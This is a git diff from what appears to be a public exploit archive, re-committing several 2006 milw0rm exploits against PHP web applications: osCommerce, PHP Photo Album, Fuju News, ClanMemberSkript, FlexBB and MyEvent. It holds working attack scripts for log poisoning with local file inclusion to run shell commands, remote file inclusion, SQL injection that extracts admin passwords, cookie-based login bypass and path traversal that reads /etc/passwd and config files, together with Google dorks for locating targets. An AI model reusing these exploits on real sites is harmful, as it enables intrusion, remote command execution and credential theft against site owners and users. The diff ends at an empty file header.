@@ -1,50 +1,50 @@ ----- osCommerce <= 2.2 "extras/" information/source code disclosure ------------ - -software site: http://www.oscommerce.com/ - - -if extras/ folder is placed inside the www path, you can see all files on target -system, including php source code with database details, poc: - -http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php -http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd - -this is the vulnerable code in update.php: - -... - include '../mysql.php'; - // if a readme.txt file exists, display it to the user - if(!$read_me) { - if(file_exists('readme.txt')) { - $readme_file = 'readme.txt'; - } - elseif(file_exists('README')) { - $readme_file = 'README'; - } - elseif(file_exists('readme')) { - $readme_file = 'readme'; - } - if($readme_file) { - $readme = file($readme_file); - print "

    \n"; - print nl2br(htmlentities(implode($readme, ' '))); - print "
    Continue
    \n"; - print "
    \n"; - exit; - } - } -... - -google search: - -inurl:"extras/update.php" intext:mysql.php -display - --------------------------------------------------------------------------------- -rgod - -site: http://retrogod.altervista.org -mail: rgod at autistici.org -original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html --------------------------------------------------------------------------------- - -# milw0rm.com [2006-04-14] +---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------ + +software site: http://www.oscommerce.com/ + + +if extras/ folder is placed inside the www path, you can see all files on target +system, including php source code with database details, poc: + +http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php +http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd + +this is the vulnerable code in update.php: + +... + include '../mysql.php'; + // if a readme.txt file exists, display it to the user + if(!$read_me) { + if(file_exists('readme.txt')) { + $readme_file = 'readme.txt'; + } + elseif(file_exists('README')) { + $readme_file = 'README'; + } + elseif(file_exists('readme')) { + $readme_file = 'readme'; + } + if($readme_file) { + $readme = file($readme_file); + print "
    \n"; + print nl2br(htmlentities(implode($readme, ' '))); + print "
    Continue
    \n"; + print "
    \n"; + exit; + } + } +... + +google search: + +inurl:"extras/update.php" intext:mysql.php -display + +-------------------------------------------------------------------------------- +rgod + +site: http://retrogod.altervista.org +mail: rgod at autistici.org +original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html +-------------------------------------------------------------------------------- + +# milw0rm.com [2006-04-14] diff --git a/platforms/php/webapps/1678.php b/platforms/php/webapps/1678.php index b41984418..ed8ccf5fc 100755 --- a/platforms/php/webapps/1678.php +++ b/platforms/php/webapps/1678.php 
@@ -1,222 +1,222 @@ -#!/usr/bin/php -q -d short_open_tag=on - this works with magic_quotes_gpc=Off & register_globals=On\r\n"; -echo "dork: \"powered by php photo album\" -demo2 -pitanje\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to php album\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /phppa/ \r\n"; -echo "php ".$argv[0]." localhost /phppa/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} -/* - software site: http://www.phpalbum.net/ - -vulnerable code in language.php at line 21-23: - "next", -"ID_PREV" => "previous", -"ID_NEXT_PAGE" => "next page", -"ID_PREV_PAGE" => "previous page", -"ID_ALBUM_NAME" => "Photoalbum", -"ID_PHOTO_DIR" => "Photos", -"ID_SETUP" => "setup", -"ID_HOME" => "Home", -"ID_NAME" => "Name", -"ID_EMAIL" => "Email", -"ID_NAME_EMAIL" => "Optional you can enter your name and email", -"ID_COMMENT_INSTR" => "Please type your message click Add New Comment", -"ID_ADD_COMMENT" => "Add new comment", -"ID_ENTER_PASSWD" => "Enter password:", -"ID_DELETE_COMMENT" => "Delete Comment", -"ID_ALBUMS" => "Albums" -); - -if(file_exists($data_dir."translation.dat")){ - include($data_dir."translation.dat"); -} -.... 
- -"data_dir" argument is uninitialized, so: -i) if magic_quotes_gpc = off and register_globals = On you can include - arbitrary files from local resources -ii) against PHP5, if register_globals = On and allow_url_fopen = 0n, - you can include an arbitrary translation.dat file from a ftp resource, poc: - - http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:somemail.com@somehost.com/public/ - -this is the code for i), you can do ii) manually - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files...\r\n"; -$CODE ='suntzusuntzu'; -$packet.="GET ".$path.$CODE." 
HTTP/1.1\r\n"; -$packet.="User-Agent: ".$CODE."\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -sleep(2); - -# fill with possible locations -$paths= array ( -"/var/log/httpd/access_log", -"/var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"/etc/httpd/logs/acces_log", -"/etc/httpd/logs/acces.log", -"/etc/httpd/logs/error_log", -"/etc/httpd/logs/error.log", -"/var/www/logs/access_log", -"/var/www/logs/access.log", -"/usr/local/apache/logs/access_log", -"/usr/local/apache/logs/access.log", -"/var/log/apache/access_log", -"/var/log/apache/access.log", -"/var/log/access_log", -"/var/www/logs/error_log", -"/var/www/logs/error.log", -"/usr/local/apache/logs/error_log", -"/usr/local/apache/logs/error.log", -"/var/log/apache/error_log", -"/var/log/apache/error.log", -"/var/log/access_log", -"/var/log/error_log" -); - -for ($i=0; $i<=count($paths)-1; $i++) -{ -$a=$i+2; -echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n"; -$packet ="GET ".$p."language.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: data_dir=".$paths[$i]."%00; cmd=".$cmd."\r\n"; //through cookies, log this ;) -$packet.="Connection: Close\r\n\r\n"; -//echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"suntzu")) -{ - echo "Exploit succeeded...\r\n"; - 
$temp=explode("suntzu",$html); - die($temp[1]); -} -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-04-15] +#!/usr/bin/php -q -d short_open_tag=on + this works with magic_quotes_gpc=Off & register_globals=On\r\n"; +echo "dork: \"powered by php photo album\" -demo2 -pitanje\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to php album\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /phppa/ \r\n"; +echo "php ".$argv[0]." localhost /phppa/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} +/* + software site: http://www.phpalbum.net/ + +vulnerable code in language.php at line 21-23: + "next", +"ID_PREV" => "previous", +"ID_NEXT_PAGE" => "next page", +"ID_PREV_PAGE" => "previous page", +"ID_ALBUM_NAME" => "Photoalbum", +"ID_PHOTO_DIR" => "Photos", +"ID_SETUP" => "setup", +"ID_HOME" => "Home", +"ID_NAME" => "Name", +"ID_EMAIL" => "Email", +"ID_NAME_EMAIL" => "Optional you can enter your name and email", +"ID_COMMENT_INSTR" => "Please type your message click Add New Comment", +"ID_ADD_COMMENT" => "Add new comment", +"ID_ENTER_PASSWD" => "Enter password:", +"ID_DELETE_COMMENT" => "Delete Comment", +"ID_ALBUMS" => "Albums" +); + +if(file_exists($data_dir."translation.dat")){ + include($data_dir."translation.dat"); +} +.... 
+ +"data_dir" argument is uninitialized, so: +i) if magic_quotes_gpc = off and register_globals = On you can include + arbitrary files from local resources +ii) against PHP5, if register_globals = On and allow_url_fopen = 0n, + you can include an arbitrary translation.dat file from a ftp resource, poc: + + http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:somemail.com@somehost.com/public/ + +this is the code for i), you can do ii) manually + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files...\r\n"; +$CODE ='suntzusuntzu'; +$packet.="GET ".$path.$CODE." 
HTTP/1.1\r\n"; +$packet.="User-Agent: ".$CODE."\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +sleep(2); + +# fill with possible locations +$paths= array ( +"/var/log/httpd/access_log", +"/var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"/etc/httpd/logs/acces_log", +"/etc/httpd/logs/acces.log", +"/etc/httpd/logs/error_log", +"/etc/httpd/logs/error.log", +"/var/www/logs/access_log", +"/var/www/logs/access.log", +"/usr/local/apache/logs/access_log", +"/usr/local/apache/logs/access.log", +"/var/log/apache/access_log", +"/var/log/apache/access.log", +"/var/log/access_log", +"/var/www/logs/error_log", +"/var/www/logs/error.log", +"/usr/local/apache/logs/error_log", +"/usr/local/apache/logs/error.log", +"/var/log/apache/error_log", +"/var/log/apache/error.log", +"/var/log/access_log", +"/var/log/error_log" +); + +for ($i=0; $i<=count($paths)-1; $i++) +{ +$a=$i+2; +echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n"; +$packet ="GET ".$p."language.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: data_dir=".$paths[$i]."%00; cmd=".$cmd."\r\n"; //through cookies, log this ;) +$packet.="Connection: Close\r\n\r\n"; +//echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"suntzu")) +{ + echo "Exploit succeeded...\r\n"; + 
$temp=explode("suntzu",$html); + die($temp[1]); +} +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-04-15] diff --git a/platforms/php/webapps/1682.php b/platforms/php/webapps/1682.php index ae3a7a678..bcaa51297 100755 --- a/platforms/php/webapps/1682.php +++ b/platforms/php/webapps/1682.php 
@@ -1,91 +1,91 @@ -> Internet Security | - |---==============================================================---| - - title: fuju news 1.0 remote sql injection - release: 2006-04-16 - author: snatcher [snatcher at gmx.ch] - country: switzerland |+| - - application: Fuju News 1.0 - description: a php / mysql based newsscript - download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=243 - description: you can get the password with a simple sql injection. - greets: honkey, str0ke <- good exploit publisher :), - all security guys and coders over the world - terms of use: this exploit is just for educational purposes, do not use it for illegal acts. - - ----------------------------- archiv2.php - line 25 -------------------------------------- -$result1 =@mysql_query("SELECT * FROM news_sql WHERE ID LIKE $ID"); ------------------------------------------------------------------------------------------ - -because this $ID isn't escaped correctly you can insert malicious sql code, -i.e. with a union operator. - - -title: fuju news 1.0 restriction bypass - -------------------------- edit_kategorie.php - line 19 ---------------------------------- -$authorized=$HTTP_COOKIE_VARS['authorized']; ------------------------------------------------------------------------------------------ - -that's the mistake of the code. you only have to create a session cookie named 'authorized' -with the value 1, and you are logged in. - -*/ -/*********************** CONFIGURATION ****************************/ - -$PATH_TO_FILE = 'http://yourhost.com/fuju/archiv2.php'; // in example: http://yourhost.com/fuju/archiv2.php -$TABLE_PREFIX = ''; // default: empty -$GET_VARS = '?ID='; // do not change -$SQL_INJECTION = '-666 union select pw,0,0,benutzer,0,0,pw from '. 
// do not change - $TABLE_PREFIX.'admin_sql /*'; - - -/**************************** MAIN ********************************/ - -$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); -foreach ($file_array as $now) - $html_content .= $now; - -$html_content = str_castrate($html_content); - -preg_match_all("!Autor:". - "(.*?)!", - $html_content,$username); /* gets username */ -preg_match_all("!Kategorie:

    (.*?)!", - $html_content,$password); /* gets password */ - -if ($username[1][0] && $password[1][0]) { - echo 'username: '.$username[1][0].'
    '; - echo 'password: '.$password[1][0].''; -}else { - echo 'exploit failed!
    '; -} -echo '




    -======================================================================
    -exploit: fuju news 1.0 remote sql injection
    -release: 2006-04-16
    -author: snatcher [snatcher at gmx.ch]
    -======================================================================'; - -function str_castrate($string) { - $string = str_replace("\n", '', $string); - $string = str_replace("\r", '', $string); - $string = str_replace(" ", '', $string); - return $string; -} -?> - -# milw0rm.com [2006-04-16] +> Internet Security | + |---==============================================================---| + + title: fuju news 1.0 remote sql injection + release: 2006-04-16 + author: snatcher [snatcher at gmx.ch] + country: switzerland |+| + + application: Fuju News 1.0 + description: a php / mysql based newsscript + download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=243 + description: you can get the password with a simple sql injection. + greets: honkey, str0ke <- good exploit publisher :), + all security guys and coders over the world + terms of use: this exploit is just for educational purposes, do not use it for illegal acts. + + +---------------------------- archiv2.php - line 25 -------------------------------------- +$result1 =@mysql_query("SELECT * FROM news_sql WHERE ID LIKE $ID"); +----------------------------------------------------------------------------------------- + +because this $ID isn't escaped correctly you can insert malicious sql code, +i.e. with a union operator. + + +title: fuju news 1.0 restriction bypass + +------------------------- edit_kategorie.php - line 19 ---------------------------------- +$authorized=$HTTP_COOKIE_VARS['authorized']; +----------------------------------------------------------------------------------------- + +that's the mistake of the code. you only have to create a session cookie named 'authorized' +with the value 1, and you are logged in. 
+ +*/ +/*********************** CONFIGURATION ****************************/ + +$PATH_TO_FILE = 'http://yourhost.com/fuju/archiv2.php'; // in example: http://yourhost.com/fuju/archiv2.php +$TABLE_PREFIX = ''; // default: empty +$GET_VARS = '?ID='; // do not change +$SQL_INJECTION = '-666 union select pw,0,0,benutzer,0,0,pw from '. // do not change + $TABLE_PREFIX.'admin_sql /*'; + + +/**************************** MAIN ********************************/ + +$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); +foreach ($file_array as $now) + $html_content .= $now; + +$html_content = str_castrate($html_content); + +preg_match_all("!Autor:". + "(.*?)!", + $html_content,$username); /* gets username */ +preg_match_all("!Kategorie:

    (.*?)!", + $html_content,$password); /* gets password */ + +if ($username[1][0] && $password[1][0]) { + echo 'username: '.$username[1][0].'
    '; + echo 'password: '.$password[1][0].''; +}else { + echo 'exploit failed!
    '; +} +echo '




    +======================================================================
    +exploit: fuju news 1.0 remote sql injection
    +release: 2006-04-16
    +author: snatcher [snatcher at gmx.ch]
    +======================================================================'; + +function str_castrate($string) { + $string = str_replace("\n", '', $string); + $string = str_replace("\r", '', $string); + $string = str_replace(" ", '', $string); + return $string; +} +?> + +# milw0rm.com [2006-04-16] diff --git a/platforms/php/webapps/1683.php b/platforms/php/webapps/1683.php index 8a92dae14..3bcc56cc0 100755 --- a/platforms/php/webapps/1683.php +++ b/platforms/php/webapps/1683.php 
@@ -1,86 +1,86 @@ -> Internet Security | - |---==============================================================---| - - title: Blackorpheus ClanMemberSkript 1.0 remote sql injection - release: 2006-04-16 - author: snatcher [snatcher at gmx.ch] - country: switzerland |+| - - application: Blackorpheus ClanMemberSkript 1.0 - description: a php / mysql based member management system - download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=21 - description: you can get each password with a simple sql injection. the password - is plaintext :) - fingerprint: google -> "powered by ClanMemberSkript" -> 18 - greets: honkey, str0ke <- good exploit publisher :), - all security guys and coders over the world, - terms of use: this exploit is just for educational purposes, do not use it for illegal acts. - - ----------------------------- member.php - line 7 ------------------------------------- -$result = MYSQL_QUERY(" SELECT * FROM $member_tab WHERE userID=$userID "); ------------------------------------------------------------------------------------------ - -because this $userID isn't escaped correctly you can insert malicious sql code, -i.e. with a union operator. - - -*/ - -/*********************** CONFIGURATION ****************************/ - -$PATH_TO_FILE = 'http://yourhost.com/member.php'; // in example: http://yourhost.com/member.php -$USER_ID = 1; // which user? default: 1 -$TABLE_PREFIX = ''; // default: empty -$GET_VARS = '?userID='; // do not change -$SQL_INJECTION = '-666 union select 0,0,0,0,0,0,0,0,0,nick,pass,'. // do not change - '0,0,0,0,0,0,0,0,0,0,0,0 from '.$TABLE_PREFIX. - 'membersettings where userID = '.$USER_ID.' limit 1/*'; - - -/**************************** MAIN ********************************/ - -$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); -foreach ($file_array as $now) - $html_content .= $now; - -$html_content = str_castrate($html_content); - -preg_match_all("!Geburtsdatum:
    (.*?)
    !", - $html_content,$username); /* gets username */ -preg_match_all("!Wohnort:
    (.*?)!", - $html_content,$password); /* gets password */ - -if ($username[1][0] && $password[1][0]) { - echo 'username: '.$username[1][0].'
    '; - echo 'password: '.$password[1][0].''; -}else { - echo 'exploit failed!
    '; -} -echo '




    -======================================================================
    -exploit: Blackorpheus ClanMemberSkript 1.0 remote sql injection
    -release: 2006-04-16
    -author: snatcher [snatcher at gmx.ch]
    -======================================================================'; - -function str_castrate($string) { - $string = str_replace("\n", '', $string); - $string = str_replace("\r", '', $string); - $string = str_replace(" ", '', $string); - return $string; -} -?> - -# milw0rm.com [2006-04-16] +> Internet Security | + |---==============================================================---| + + title: Blackorpheus ClanMemberSkript 1.0 remote sql injection + release: 2006-04-16 + author: snatcher [snatcher at gmx.ch] + country: switzerland |+| + + application: Blackorpheus ClanMemberSkript 1.0 + description: a php / mysql based member management system + download: http://www.clanscripte.net/main.php?content=download&do=file&dlid=21 + description: you can get each password with a simple sql injection. the password + is plaintext :) + fingerprint: google -> "powered by ClanMemberSkript" -> 18 + greets: honkey, str0ke <- good exploit publisher :), + all security guys and coders over the world, + terms of use: this exploit is just for educational purposes, do not use it for illegal acts. + + +---------------------------- member.php - line 7 ------------------------------------- +$result = MYSQL_QUERY(" SELECT * FROM $member_tab WHERE userID=$userID "); +----------------------------------------------------------------------------------------- + +because this $userID isn't escaped correctly you can insert malicious sql code, +i.e. with a union operator. + + +*/ + +/*********************** CONFIGURATION ****************************/ + +$PATH_TO_FILE = 'http://yourhost.com/member.php'; // in example: http://yourhost.com/member.php +$USER_ID = 1; // which user? default: 1 +$TABLE_PREFIX = ''; // default: empty +$GET_VARS = '?userID='; // do not change +$SQL_INJECTION = '-666 union select 0,0,0,0,0,0,0,0,0,nick,pass,'. // do not change + '0,0,0,0,0,0,0,0,0,0,0,0 from '.$TABLE_PREFIX. + 'membersettings where userID = '.$USER_ID.' 
limit 1/*'; + + +/**************************** MAIN ********************************/ + +$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); +foreach ($file_array as $now) + $html_content .= $now; + +$html_content = str_castrate($html_content); + +preg_match_all("!Geburtsdatum:(.*?)!", + $html_content,$username); /* gets username */ +preg_match_all("!Wohnort:(.*?)!", + $html_content,$password); /* gets password */ + +if ($username[1][0] && $password[1][0]) { + echo 'username: '.$username[1][0].'
    '; + echo 'password: '.$password[1][0].''; +}else { + echo 'exploit failed!
    '; +} +echo '




    +======================================================================
    +exploit: Blackorpheus ClanMemberSkript 1.0 remote sql injection
    +release: 2006-04-16
    +author: snatcher [snatcher at gmx.ch]
    +======================================================================'; + +function str_castrate($string) { + $string = str_replace("\n", '', $string); + $string = str_replace("\r", '', $string); + $string = str_replace(" ", '', $string); + return $string; +} +?> + +# milw0rm.com [2006-04-16] diff --git a/platforms/php/webapps/1686.pl b/platforms/php/webapps/1686.pl index 38f9c8ab4..383f73489 100755 --- a/platforms/php/webapps/1686.pl +++ b/platforms/php/webapps/1686.pl 
@@ -1,52 +1,52 @@ -#!/usr/bin/perl -w - -# FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit , Perl C0d3 -# -# Milw0rm ID :- -# http://www.milw0rm.com/auth.php?id=1539 -# D3vil-0x1 | Devil-00 < BlackHat > :) -# -# DONT FORGET TO DO YOUR CONFIG !! -# DONT FORGET TO DO YOUR CONFIG !! -# DONT FORGET TO DO YOUR CONFIG !! -use IO::Socket; - -##-- Start --# - -$host = "127.0.0.1"; -$path = "/flexbb/"; - -##-- _END_ --## -# $host :- -# The Host Name Without http:// | exm. www.vic.com -# -# $path :- -# FlexBB Dir On Server | exm. /flexbb/ - -$sock = IO::Socket::INET->new ( - PeerAddr => "$host", - PeerPort => "80", - Proto => "tcp" - ) or die("[!] Connect To Server Was Filed"); -##-- DONT TRY TO EDIT ME --## -$evilcookie = "flexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;"; -##-- DONT TRY TO EDIT ME --## -$evildata = "GET ".$path."index.php?action=buddypopup HTTP/1.1\n"; -$evildata .= "Host: $host \n"; -$evildata .= "Accept: */* \n"; -$evildata .= "Keep-Alive: 300\n"; -$evildata .= "Connection: keep-alive \n"; -$evildata .= "Cookie: ".$evilcookie."\n\n"; - -print $sock $evildata; - -while($ans = <$sock>){ -# - if($ans =~ m/(.*?)<\/a>/){ - print "\n[+] Bypass [ OKAY ] Edit your cookies :-\n\n"; - print "\tflexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;\n\n"; - exit; - } -} - -# milw0rm.com [2006-04-17] +#!/usr/bin/perl -w + +# FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit , Perl C0d3 +# +# Milw0rm ID :- +# http://www.milw0rm.com/auth.php?id=1539 +# D3vil-0x1 | Devil-00 < BlackHat > :) +# +# DONT FORGET TO DO YOUR CONFIG !! +# DONT FORGET TO DO YOUR CONFIG !! +# DONT FORGET TO DO YOUR CONFIG !! +use IO::Socket; + +##-- Start --# + +$host = "127.0.0.1"; +$path = "/flexbb/"; + +##-- _END_ --## +# $host :- +# The Host Name Without http:// | exm. 
www.vic.com +# +# $path :- +# FlexBB Dir On Server | exm. /flexbb/ + +$sock = IO::Socket::INET->new ( + PeerAddr => "$host", + PeerPort => "80", + Proto => "tcp" + ) or die("[!] Connect To Server Was Filed"); +##-- DONT TRY TO EDIT ME --## +$evilcookie = "flexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;"; +##-- DONT TRY TO EDIT ME --## +$evildata = "GET ".$path."index.php?action=buddypopup HTTP/1.1\n"; +$evildata .= "Host: $host \n"; +$evildata .= "Accept: */* \n"; +$evildata .= "Keep-Alive: 300\n"; +$evildata .= "Connection: keep-alive \n"; +$evildata .= "Cookie: ".$evilcookie."\n\n"; + +print $sock $evildata; + +while($ans = <$sock>){ +# + if($ans =~ m/(.*?)<\/a>/){ + print "\n[+] Bypass [ OKAY ] Edit your cookies :-\n\n"; + print "\tflexbb_username='UNION SELECT id,username,password,4,usertype,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 FROM flexbb_users WHERE id=1/*;\n\n"; + exit; + } +} + +# milw0rm.com [2006-04-17] diff --git a/platforms/php/webapps/1687.txt b/platforms/php/webapps/1687.txt index 3b3c3e30b..c955410c4 100755 --- a/platforms/php/webapps/1687.txt +++ b/platforms/php/webapps/1687.txt @@ -1,10 +1,10 @@ -Script : MyEvent -Version : 1.2 -Risk : High -Class : Remote -Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends -Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" - -http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a - -# milw0rm.com [2006-04-17] +Script : MyEvent +Version : 1.2 +Risk : High +Class : Remote +Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends +Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" + +http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a + +# milw0rm.com [2006-04-17] diff --git a/platforms/php/webapps/1694.pl b/platforms/php/webapps/1694.pl index 2d1195c33..743ffc059 100755 
--- a/platforms/php/webapps/1694.pl +++ b/platforms/php/webapps/1694.pl 
